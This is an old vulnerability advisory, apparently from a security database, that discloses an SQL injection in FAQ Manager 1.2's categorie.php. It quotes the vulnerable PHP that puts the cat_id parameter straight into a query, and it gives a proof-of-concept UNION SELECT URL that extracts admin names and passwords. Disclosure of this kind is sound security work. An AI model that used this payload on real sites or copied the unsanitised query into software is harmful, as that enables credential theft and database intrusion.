FAQ Manager 1.2 (categorie.php cat_id) SQL Injection Vulnerability

2008-12-02 / 2008-12-03
Credit: cOndemned
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+---------------------------------------------------------------------------------------+ | | | FAQ Manager 1.2 (categorie.php cat_id) Remote SQL Injection Vulnerability | | Bug found by cOndemned | | | | Script site : http://www.4yoursite.nl/script_faq_manager.php | | | | Greetz: ZaBeaTy, str0ke, doctor, Necro, 0in, TBH, Av... | | | +---------------------------------------------------------------------------------------+ # source of categorie.php [ ... ] 21. $catid = $_GET['cat_id']; [ ... ] 72. $faq_query = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid"); 73. while($faq = mysql_fetch_assoc($faq_query)) 74. { 75. $faq_cat_id = ($faq['faq_cat_id']); 76. } 77. 78. $result = mysql_query("SELECT * FROM `".$prefix."_faq` WHERE `faq_cat_id` = $catid"); [ ... ] # proof of concept http://[host]/[faq_manager_path]/catagorie.php?cat_id=3+union+select+1,2,concat_ws(0x3a,admin_name,admin_pass),4,5+from+faq_admin/*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top